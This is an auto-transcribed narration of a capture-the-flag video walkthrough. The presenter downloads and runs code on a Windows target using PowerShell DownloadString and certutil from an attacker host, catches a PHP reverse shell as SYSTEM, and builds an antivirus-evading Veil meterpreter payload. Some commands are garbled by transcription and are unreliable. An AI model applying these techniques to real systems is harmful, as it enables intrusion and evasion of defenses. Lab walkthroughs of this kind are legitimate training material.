Yeah, so let's give this a shot. So first thing we need to do is pull that. We can use the cert-util command again, cert-util.exe URL cache split. By the way, we could be using PowerShell at this point. We could use the PowerShell exec bypass, non-interactive, same command we used with the cat. We might have to specify the version 2 in order to get it to execute. Actually, why don't we just try that first so that you can see if it fails. I can show you what I mean by how we can bypass constrained language mode. We do PowerShell dash version, or let's not do version 2 first. PowerShell IEX, new object. This should fail because we're using some stuff that it shouldn't be allowing in constrained language mode. Client download string 14.15 slash shell.php. Yeah, so cannot create type, only core types are supported in this language mode. So if we do instead version 2, new object system.out.download string, and I'm typing all kinds of wrong. 10.14.15 shell.php. Let's see if it likes that a little bit more. I believe it should. We can look over here and see. Yeah, so let's grab shell.php. Did it try and execute it? think we should be able to just take this and write it out to shell.php. Okay, I'm probably screwing up something really stupid, but little sleep and early in the morning doesn't work well. So for now, since it's not really important, and that does show you how to bypass constrained language mode, let's just go to what we know, util.exe URL cache split fhttp 10.10.14.15 accesschk.exe. Oh, we're not getting accesschk, we're going to shell.php. And then we'll write that out to cqlmap64, which is the WAMP folder, and then www shell.php. So it says that completed correctly. Let's start up a listener here, and c-lvnp 444. So now if we browse to shell.php, it might give us a shell, or it might not. That's interesting. So we got a connection back, but we don't. See catch shell.php. Oh, that's funny. Even though I catted it and looked at it twice, I still made a stupid mistake. Terminated it with the wrong line terminator. So let's repeat this step. And then try this again. Oh, we don't have our listener running. Try this again. We can see that it's just hanging this time, which is usually pretty promising. And so we've got a shell back. And so if we do a who am I, we are our system, means we can do whatever we want. So if we do a cc//users administrator desktop, we can see the root text flag, PowerShell, exec bypass, non-interactive, cat, administrator, desktop, root.txt, substring. I almost showed you the whole thing on accident. And so there we have the root flag now. And so I was actually going to show you a different way to get a shell, which I suppose I can do now, and it'll just be some extra at the end of the video if you want to watch it. The way we were going to go about doing it was to use metasploit and veil. Metasploit itself, if we used any meterpreter modules and stuff, didn't work on this box. They likely got picked up by antivirus, because we could usually get them on, and then after a few seconds, the file would disappear. So if we do a use exploit multi-handler, set the payload to Windows meterpreter rev TCP. Oh, sorry, reverse TCP. Show our options, set our lhost to 10.10.14.15, leave everything else alone, set exit on session to false, exploit. So we've got a reverse handler, normal stuff listening. So what we can try and do now is create a payload in veil, and veil should be in user share, I believe. So c user share veil. And so veil can allow us to create some different payloads like meterpreter reverse TCP payloads, but that are designed to evade antivirus. It's got an interactive console like Metasploit, but I don't use it much, so instead I'm just going to show you how to generate a payload on the command line. So if you do veil type, we're going to create an evasion payload. We're actually going to use Go. It's a meterpreter module, so they have one written in Go. I've noticed it seems to work well on boxes with antivirus, presumably because nobody uses it yet. I don't know, but some of the other ones get picked up easier. cp.py, and we just set our normal options, so IP 10.10.14.15, port 4444. I can't type something apparently. Unrecognized options, port 4444. Oh. So that's written out. So it writes out source code, the executable module, and a metasploit resource file, all the fun stuff. All we care about here is the executable. So we'll copy that. Let's see. Copy that over to our working directory. Sure, we'll call it payload 1. So we're still serving out of this directory. So if we do a, let's see, we still got the admin shell, but we're back in our user one now. So if we do a cert util curl cache split f 10, 10, 14, 15 slash payload 1.exe, and we can write that to here, I guess. Payload 1.exe. I'll define the specified path. So it looks like it got it fine, so the problem is on our side over here. Shouldn't matter, but let's just do it this way. Oh, I was probably using, no, I was using the right ones. Who knows? Okay, so it got copied over this time. So now if we just edit our shell.php, and make it call payload 1 with no arguments. Copy it again. Oh, this may fail. Let's see. Because it's technically being used right now. Although I guess the shell.php part's not. That should have ended already. Okay. So now if we call shell.php and go back into here and look at our metasploit. Oh, we didn't catch it. We downloaded shell.php, we downloaded payload 1.exe. Let's go type sql//wamp64 gov shell.php. Yeah, so that should be working. It's possible too that we have a cached one, maybe. There we go. Oh, I forgot to, let's see, session-i1 shell. So there you go, that one works too. So that allows you to use a meterpreter session if you wanted to. And so then you could have full, your normal meterpreter commands. Kind of helps to push files up and pull them down. But anyway, that's it. So I hope you enjoyed this box. If you actually did it, you'll know that, even though this video is long, at least for me, this box took a long time. There was a lot of stuff to look at. So I hope you enjoyed the video. Give it a thumbs up, subscribe, follow me on Twitter, whatever. And I will see you next time.